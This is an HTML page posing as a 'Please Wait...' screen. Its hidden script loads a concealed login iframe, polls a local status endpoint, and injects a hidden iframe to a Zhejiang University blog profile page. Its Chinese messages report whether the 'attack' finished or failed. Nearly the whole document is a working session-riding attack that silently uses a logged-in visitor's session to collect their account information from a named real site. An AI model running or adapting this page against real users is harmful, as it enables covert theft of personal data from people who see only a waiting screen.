<!DOCTYPE html>
<html>
<head>
    <title>Please Wait...</title>
    <script src="jquery-3.2.1.min.js"></script>
</head>
<body style="display: none">
<iframe src="qzlake_login.html" style="display: none;"></iframe>
<script type="text/javascript">
var needloop=true;
function add(){
    if(needloop){
        jQuery.get("/status",function(data,status){
            if(data=="no init"){
                obj = document.createElement("iframe");
                obj.src = "http://www.qzlake.zju.edu.cn/blog/my_info.php";
                document.body.appendChild(obj);
            }else{
                //needloop=false;
                if(data=="finished") {
                    //window.location.href="/result";
                    needloop=false;
                    document.writeln("攻击已经完成，<a href='/result'>查看结果</a>");
                }
                else if(data=="failed") {
                    needloop = false;
                    document.writeln("攻击失败，请先登录<a href='http://my.zju.edu.cn'>我的浙大</a><br><a href='/reset'>重试攻击</a>");
                }
            }
        });
    }
}
setInterval(add,1000);
</script>

</html>